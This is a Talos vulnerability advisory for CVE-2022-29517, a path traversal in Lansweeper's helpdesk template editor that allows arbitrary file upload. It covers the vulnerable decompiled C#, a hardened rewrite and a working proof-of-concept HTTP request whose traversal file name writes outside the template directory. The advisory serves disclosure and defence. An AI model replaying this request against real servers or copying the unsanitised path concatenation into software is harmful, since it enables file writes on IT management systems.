CVE-2022-29517: TALOS-2022-1529 || Cisco Talos Intelligence Group

SUMMARY

A directory traversal vulnerability exists in the HelpdeskActions.aspx edittemplate functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Lansweeper lansweeper 10.1.1.0

PRODUCT URLS

lansweeper - https://www.lansweeper.com/

CVSSv3 SCORE

9.9 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

DETAILS

Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and audit purposes.

An exploitable directory traversal vulnerability is reachable through the following action: Helpdesk -> choose any ticket -> Template [editor window] -> Edit any template -> add inline file. The vulnerable code is located in the LS\WS\HelpdeskActions.cs file. Let us take a close look at it:

Line 1  private static void EditTemplate()
Line 2  {
Line 3      HttpContext current = HttpContext.Current;
Line 4      Page page = (Page)HttpContext.Current.Handler;
Line 5      JsReturnObject jsReturnObject = new JsReturnObject();
Line 6      int num = int.Parse(current.Request["id"]);
Line 7      string text = current.Request["templatetext"];
Line 8      string text2 = current.Request["name"];
Line 9      int value = int.Parse(current.Request["templatecategory"]);
Line 10     bool flag = false;
Line 11     HttpFileCollection files = current.Request.Files;
Line 12     
Line 13             for (int m = 1; m <= int.Parse(current.Request["inlineattachmentste"]); m++)
Line 14             {
Line 15                 int num2 = (current.Request["inlineattachment" + m] ?? "").IndexOf("base64"); // attacker-controlled data URI
Line 16                 if (current.Request["inlineattachment" + m] == null || num2 <= 0)
Line 17                 {
Line 18                     continue;
Line 19                 }
Line 20                 string path = LSFolder.HelpdeskTemplateFiles.GetPath();
Line 21                 
Line 22                 byte[] array2 = Convert.FromBase64String(current.Request["inlineattachment" + m].Substring(num2 + 7));
Line 23                 string text7 = num + "_" + current.Request["inlineattachmentname" + m]; // file name taken verbatim from the request, no traversal check
Line 24                 try
Line 25                 {
Line 26                     FileStream fileStream = new FileStream(path + text7, FileMode.CreateNew, FileAccess.Write, FileShare.None); // plain string concatenation: ".." sequences escape the template directory
Line 27                     try
Line 28                     {
Line 29                         fileStream.Write(array2, 0, array2.Length);
Line 30                         flag = true;
Line 31                     }
Line 32                     finally
Line 33                     {
Line 34                         ((IDisposable)fileStream).Dispose();
Line 35                     }
Line 36                 }
Line 37                 catch
Line 38                 {
Line 39                 }
Line 40             }           

When creating a ticket template, a user can add inline files to it (inlineattachment). Each inline file entry has its own name, inlineattachmentname. The inlineattachmentname value is not sanitized at all against directory traversal, and it is simply concatenated with the path to the helpdesk template files directory (line 26). The lack of proper sanitization of inlineattachmentname allows an attacker to upload a file to an arbitrary destination within the file system.
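As an added example (not Lansweeper's code), the following C# shows the unsafe concatenation from line 26 next to a hardened replacement that keeps only the leaf file name and verifies the canonical path still lies under the template directory. The template directory constant and the class and method names are assumptions for illustration; the attachment name is the one from the proof-of-concept request.

```csharp
using System;
using System.IO;

// Added example, not part of the Lansweeper code base.
static class TemplateAttachmentPath
{
    // Vulnerable: mirrors "path + text7" from the decompiled EditTemplate().
    // templateDir is assumed to end with a directory separator.
    public static string UnsafeBuild(string templateDir, int templateId, string attachmentName)
    {
        return templateDir + templateId + "_" + attachmentName;
    }

    // Hardened: drop any directory component, reject odd names, then
    // canonicalize and check the result stays inside the template directory.
    public static string SafeBuild(string templateDir, int templateId, string attachmentName)
    {
        if (string.IsNullOrWhiteSpace(attachmentName))
            throw new ArgumentException("empty attachment name");

        // On Windows Path.GetFileName strips everything up to the last '\' or '/'.
        string leaf = Path.GetFileName(attachmentName);
        if (leaf.Length == 0 || leaf == "." || leaf == ".."
            || leaf.IndexOfAny(Path.GetInvalidFileNameChars()) >= 0)
            throw new ArgumentException("invalid attachment name");

        string baseDir = Path.GetFullPath(templateDir);
        if (!baseDir.EndsWith(Path.DirectorySeparatorChar.ToString()))
            baseDir += Path.DirectorySeparatorChar;

        // Defence in depth: even with a clean leaf, compare the canonical path prefix.
        string full = Path.GetFullPath(Path.Combine(baseDir, templateId + "_" + leaf));
        if (!full.StartsWith(baseDir, StringComparison.OrdinalIgnoreCase))
            throw new UnauthorizedAccessException("attachment path escapes template directory");
        return full;
    }

    static void Main()
    {
        const string dir = @"C:\Lansweeper\templatefiles\";      // assumed placeholder location
        const string evil = @"..\..\..\..\..\..\..\HACKED.jpg";  // name from the PoC request
        Console.WriteLine(UnsafeBuild(dir, 2, evil));            // resolves outside the template directory
        try { SafeBuild(dir, 2, evil); }
        catch (Exception e) { Console.WriteLine("rejected: " + e.Message); }
        Console.WriteLine(SafeBuild(dir, 2, "cat123.jpg"));      // C:\Lansweeper\templatefiles\2_cat123.jpg
    }
}
```

An extension allowlist on the leaf name would further limit what an authenticated user can place in the template directory.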

Exploit Proof of Concept

REQUEST

POST /helpdesk/HelpdeskActions.aspx?action=edittemplate&id=2 HTTP/1.1
Host: 192.168.0.102:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------12029611817265063291319576436
Content-Length: 2156
Origin: http://192.168.0.102:81
Connection: close
Referer: http://192.168.0.102:81/helpdesk/ticket.aspx?nonew=-7&tid=24
Cookie: UserSettings=language=1; ASP.NET_SessionId=ke33dhy3jtng0hcwed2fe5av; custauth=username=hacker&userdomain=; __RequestVerificationToken_Lw__=zP2evPOU4gLNF/pF3R1XPsIP7ceImHsHKoqy7GfYwDnIwHnDJKt3r5+0bFTXNS/XpEAiyEFBVT2ekfSLIPgVMULtvi8Ae4qLSYcUO0UH90vcERUKMi72E3I2yEJexWSyNKlA8gcXlfMPYbc0a94Dji44b2cNn4aS0KGOSUQBn/0=
Upgrade-Insecure-Requests: 1

-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="__VIEWSTATE"


-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="name"

Approval
-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="templatetext"

<span><img style="max-width: 950px;" src="/helpdesk/TicketTemplateActions.aspx?action=gettemplateattachment&amp;fileuid=cat123.jpg&amp;templateid=2" alt="cat123.jpg"></span>Thank you, we have received your request.<div><br></div><div>After we got an approval we will execute all required steps in order to provide what you need. We kindly ask for your patience until someone from the helpdesk will contact you.</div><div><br></div><div>In case we would need further information, this ticket will be assigned back to you in state "Awaiting Reply". Please provide necessary details as soon as possible in order to ensure swift processing.</div>
-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="templatecategory"

1
-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="inlineattachment1"

data:application/octet-stream;base64,WW91IGhhdmUgYmVlbiAwd24zZCE=
-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="inlineattachmentname1"

..\..\..\..\..\..\..\HACKED.jpg
-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="inlineattachment3"

data:text/plain;base64,dmVyc2lvbj0xOS4wLjAKY2xpZW50PWZpcmViYXNlLWFuYWx5dGljcwpmaXJlYmFzZS1hbmFseXRpY3NfY2xpZW50PTE5LjAuMAo=
-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="inlineattachmentname3"

firebase-analytics.jpg
-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="inlineattachmentste"

3
-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="filestodelete"


-----------------------------12029611817265063291319576436--

RESPONSE

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.0
x-frame-options: SAMEORIGIN
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 07 Jun 2022 13:32:56 GMT
Connection: close
Content-Length: 173

{"ErrorType":"","Error":false,"Emsg":"","AddedRows":[["Approval","1","True"]],"Columns":[],"Columnwid":[],"Action":"","ReturnValues":{},"ReturnValue":"","ReturnObject":null}

TIMELINE

2022-06-27 - Vendor Disclosure
2022-11-29 - Vendor Patch Release
2022-12-01 - Public Release

Discovered by Marcin ‘Icewall’ Noga of Cisco Talos.
